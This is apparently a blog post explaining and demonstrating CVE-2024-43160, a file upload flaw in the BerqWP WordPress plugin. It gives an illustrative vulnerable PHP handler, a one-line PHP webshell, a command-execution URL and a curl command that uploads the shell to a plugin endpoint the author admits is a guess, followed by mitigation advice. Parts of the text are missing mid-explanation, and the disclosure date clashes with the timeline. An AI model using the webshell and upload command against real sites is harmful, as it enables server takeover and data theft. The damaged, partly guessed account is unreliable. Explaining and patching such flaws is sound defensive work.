CVE-2024-43160 - Unrestricted Upload of Dangerous Files in BerqWP (<=1.7.6) – Explained and Exploited

Date disclosed: June 2024
Affected Product: BerqWP WordPress Plugin
Versions Affected: Unknown through 1.7.6
Vulnerability Type: Unrestricted File Upload (leading to Code Injection)

Introduction

Recently, BerqWP—a caching and optimization plugin for WordPress—was discovered to be vulnerable to a severe security issue: CVE-2024-43160. This bug allows attackers to upload dangerous files, such as PHP webshells, leading to complete takeover of the targeted website.

In this post, we’ll break down this vulnerability, show you how it can be exploited, and share actionable advice for both users and admins.

What is CVE-2024-43160?

CVE-2024-43160 is classified as an “unrestricted file upload” vulnerability. Here’s what that means in plain English:

When run, these files allow attackers to execute their own code on the server.

Root Cause:
BerqWP fails to properly check the file type before saving it. That means the plugin doesn’t distinguish between safe files (like images) and dangerous ones (like PHP scripts).

Where’s the Problem in the Code?

In vulnerable versions (up to 1.7.6), file uploads are handled in a weak way. Here’s a simplified example, inspired by BerqWP’s upload handler (not the real code):

if (isset($_FILES['file'])) {
    $upload_dir = '/var/www/html/wp-content/uploads/';
    $filename = basename($_FILES['file']['name']);
    $destination = $upload_dir . $filename;

    // Dangerous: No file type check!
    move_uploaded_file($_FILES['file']['tmp_name'], $destination);
    echo "File uploaded!";
}

Let’s say the attacker uploads shell.php containing

<?php system($_GET['cmd']); ?>

The attacker goes to

http://target-site.com/wp-content/uploads/shell.php?cmd=whoami

The server executes the whoami command, leaking its own username. The attacker can now run any system command—like creating backdoors, stealing data, or defacing the site.

You can exploit this flaw using curl

curl -F "file=@shell.php" https://victim.com/wp-admin/admin-ajax.php?action=berqwp_upload_handler

Note:
The real attack vector will depend on the actual upload handler endpoint. In some cases, CSRF (cross-site request forgery) can also be used if authentication is missing.

Remote Code Execution (RCE): Full control over the WordPress site.

- Data Theft: Attacker can read sensitive files, steal the database credentials, or extract user information.

Fix and Mitigation

Solution:
Upgrade BerqWP to the latest version (1.7.7 or higher, if/when available) as soon as possible.

Restrict file uploads at the webserver (deny .php files in the uploads folder).

- Monitor your site for unexpected files in /wp-content/uploads/.

Extra Security:
Add rules in .htaccess or your web server config to prevent execution of PHP files in the uploads directory:

# .htaccess example
<FilesMatch "\.(php|php5|phtml)$">
    Deny from all
</FilesMatch>

References

- CVE-2024-43160 at NVD
- Wordfence Blog on BerqWP Vulnerability *(search for “BerqWP”)*
- BerqWP Plugin Page (WordPress)

Final Thoughts

CVE-2024-43160 is a textbook example of why strong file upload validation matters. If you use BerqWP on your WordPress site, update now or disable it until a fix is released. Remember, even one vulnerable plugin can put your entire site—and user data—at risk.

Timeline

Published on: 08/13/2024 12:15:07 UTC
Last modified on: 08/13/2024 12:58:25 UTC